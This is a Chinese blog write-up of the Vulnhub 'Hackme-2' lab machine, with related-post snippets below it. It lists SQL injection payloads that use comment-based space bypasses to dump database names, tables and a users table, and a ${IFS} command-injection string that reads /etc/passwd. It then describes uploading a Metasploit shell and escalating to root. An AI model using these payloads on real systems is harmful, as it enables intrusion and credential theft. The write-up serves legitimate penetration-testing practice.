Hackme-2靶机

已于 2023-06-14 20:13:02 修改
阅读量122 收藏
点赞数
分类专栏: vulnhub靶场 文章标签: 数据库 sql
于 2023-06-12 14:18:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjxxxy/article/details/131167376
版权

一、靶机介绍

1.下载地址:https://www.vulnhub.com/entry/hackme-2,618/

2.将靶机网络适配器改为仅主机模式

 

3.启动靶机

、信息收集

1.扫描靶机,发现其开放22、80端口

nmap 192.168.139.1/24

2.浏览器访问

 

3.注册用户并登录,admin/123456

 

 4.尝试sql手工注入

a%'/**/and/**/length(database())>1#

尝试一下 union 注入 

  1. a%'/**/union/**/select/**/1,2,3#

获取数据库名等基本信息 

x%'/**/union/**/select/**/user(),database(),version()#

获取表名 

x%'/**/union/**/select/**/TABLE_NAME,2,3/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database()#

 获取列名

x%'/**/union/**/select/**/column_name,2,3/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA=database()/**/and/**/TABLE_NAME='users'#

获取表信息 

x%'/**/union/**/select/**/user,pasword,3/**/from/**/users# 

5.解密密码 

解密后:Uncrackable

 

6.使用超级管理员登录,发现其存在文件上传点

 

 7.尝试上传phpinfo.php文件,发现上传失败,限制了上传格式

8.确认存在命令执行漏洞 

9.进一步验证,判断其可能存在空格过滤 

10.尝试绕过空格过滤

system('cat${IFS}/etc/passwd')

11.获取文件上传的路径 

12.通过kali生成木马

13.通过网页上传.png,并改包

 

14.kali开启msf监听

15.浏览器访问木马文件,msf反弹成功

16.切换到shell,输入whoami可查看具体信息

 

17.跳转到home/legacy目录下,ls发现 ./touchmenot文件

18.输入 ./touchmenot,运行获得root

 

zjxxxy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
记录一次vulhub:hackme2-DHCP靶场复现
sszsNo1的博客
06-24 103
复现vulhub中的hackme2-DHCP靶场,最后拿下shell
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3550
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
在本例中,我们使用nmap命令来扫描靶机的开放端口,得到其开放的服务类型和版本信息,例如ssh服务的版本为OpenSSH 7.9p1 Debian 10+deb10u2,http服务的版本为Apache httpd 2.4.38,mysql服务的版本为MySQL 8.0.19等...
sqli-labs-master靶机
10-12
sqli-labs是一个专门为学习和测试SQL注入技术而设计的靶机平台,它提供了多个层次的练习,帮助用户逐步理解和掌握SQL注入的防范与应对策略。 一、sqli-labs靶机介绍 sqli-labs靶机由一系列精心设计的挑战组成,每个...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Python爬虫与MongoDB的完美结合
weixin_52392194的博客
08-03 746
我们掌握了在Windows和Linux系统下安装MongoDB,设计适合爬虫存储数据的写入规范,并通过实际爬虫示例展示了如何将爬取到的数据存储到MongoDB中。此外,还进行了MongoDB性能优化,提高了数据存储和查询的效率。
java笔记 mybatis 基本增删改
qq_63095129的博客
08-05 712
在pom.xml文件中添加依赖。
【MySQL】慢sql优化全流程解析
k123456kah的博客
08-04 1065
explain 是 MySQL 提供的一种用于分析和调试 SQL 查询的工具。 通过使用 explain,可以了解 MySQL 在执行查询时采用的具体执行计划,包括访问数据表的方式、使用的索引、连接表的顺序等信息。这些信息对于优化查询性能至关重要。
SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档
m0_74283290的博客
08-03 1285
本论文阐述了一套先进的图书管理系统的设计与实现,该系统采用Java语言,结合现代Web开发框架和技术,旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心,整合MyBatis ORM工具,以及MySQL数据库,构建了一个高性能、可扩展的后端服务。前端界面则采用了Vue.js框架,以提供流畅的用户交互体验。论文首先进行了详尽的需求分析,确定了系统的核心功能,包括图书的添加、编辑、删除、查询,读者的注册、登录、个人信息管理,以及图书的借阅、归还、续借流程。
04、MySQL-DCL(数据控制语言)
nibabaoo的博客
08-06 249
例:创建用户zhangsan 只能够在当前主机localhost访问 密码123456。例:创建用户xiaoming 可以在任意主机访问该数据库 密码123456。例:修改用户zhangsan的密码为654321。例:删除用户xiaoming。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1031
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
用 Bytebase 实现批量、多环境、多租户数据库的丝滑变更
Bytebase的博客
08-02 1151
现在,你已学会如何使用部署配置和数据库分组在 Bytebase 中运行批量更改。动手试试吧!💡 更多资讯,请关注 Bytebase 公号:Bytebase。
8.7-主从数据库的配置+mysql的增删改查
qq_70752758的博客
08-07 439
Slave_IO_Running和Slave_SQL_Running都是yes就表示主从数据库配置成功了。insert into 表名称 values(1,"name","word")先查看按照升序排列的qty,然后在这基础上在按照price的升序排列进行查看。当使用聚合查询以后,不能使用where,如果要使用,添加having。insert into 表名称 select * from 其他表。insert into 表 value () ,()创建可以远程登录的用户。查看升序排列的qty。
使用MySQLdump定时备份数据库实战
ithongchou的博客
08-03 106
手动执行脚本文件,并查看结果,检验脚本没有问题,因为脚本第一行已经指定脚本执行器,所以这里执行不需要使用。工具来设置定时任务。以下是一个简单的例子,展示如何每天凌晨。然后,你需要设置一个cron任务来定时执行这个脚本。确定系统定时任务已经开始,查看系统定时任务是否已经开启。上编辑的脚本格式在·Linux·平台不兼容问题。首先,你需要创建一个备份脚本。进行数据库的定时备份,你可以使用。保存这个脚本到一个文件,比如。
C++ SQL ORM
最新发布
一个大佬的博客
08-07 390
【代码】C++ SQL ORM。
大数据-61 Kafka 高级特性 消息消费02-主题与分区 自定义反序列化 拦截器 位移提交 位移管理 重平衡
永远好奇,无限进步!
08-02 1080
上节我们完成了消费组测试、消费组心跳机制、相关配置参数等内容。本节研究Kafka高级特性的 主题与分区 自定义反序列 拦截器 位移提交 重平衡 如何避免重平衡等概念问题。重平衡可以说是Kafka中诟病最厉害的一部分。 重平衡是一个协议,它规定了如何让消费者组下的所有消费者来分配Topic中每一个分区。要完全避免重平衡做不到,但是要尽量避免重平衡。 在分布式系统中,由于网络问题没有接收到心跳,此时不确认是挂了还是负载没过来还是网络阻塞。
Switchover和Failover切换方案(实战)
一个只求实际的程序猿
08-02 811
-检查主库下switchover_status字段,如果值为"session active"或者"to standby", 则主数据库角色可以切换为备库角色。=======================检查=================================--两个节点各执行2次。2.--备库切换为主库(切换可在1节点执行,启停需所有集群节点都执行)3.--主库切换为备库(切换1节点执行,启停需所有集群节点都执行)4.--获取主、备库上的信息以及保护模式(主备库执行)
kali linux部署upload-labs靶机
09-08
要在Kali Linux上部署upload-labs靶机,您需要按照以下步骤进行操作: 1. 首先,您需要通过SSH连接到一个Linux主机。根据提供的端口和地址,使用以下命令连接到目标主机: `ssh -p 25142 root@node4.buuoj.cn` 2. 下载并解压upload-labs靶机安装包。您可以使用提供的链接下载`upload-labs-0.1.zip`文件。将其解压缩,并将相关文件放入容器中以供运行。 3. 确保您的Kali Linux系统满足Docker的运行要求。首先,检查当前Linux系统的内核版本,使用以下命令: `uname -a` 如果内核版本大于等于3.10,您的系统符合要求。否则,您可能需要更新内核或使用支持Docker的其他系统。 4. 更新apt源以满足下载要求。根据您的具体需求,可能需要更新apt源来获取所需的软件包。 5. 启动upload-labs靶机。根据提供的问题描述,您可能需要进行代码审计,并利用文件包含漏洞,通过URL参数来读取敏感文件。一个示例的URL可能是:`http://your-upload-labs-url/?file=/flag`,其中`your-upload-labs-url`是您部署upload-labs靶机的URL地址。您需要根据具体情况进行进一步的测试和配置。 请注意,这只是一个简要的概述,并且具体的部署步骤可能会因不同的环境和需求而有所不同。建议您参考相关文档和指南以获取更详细的部署信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值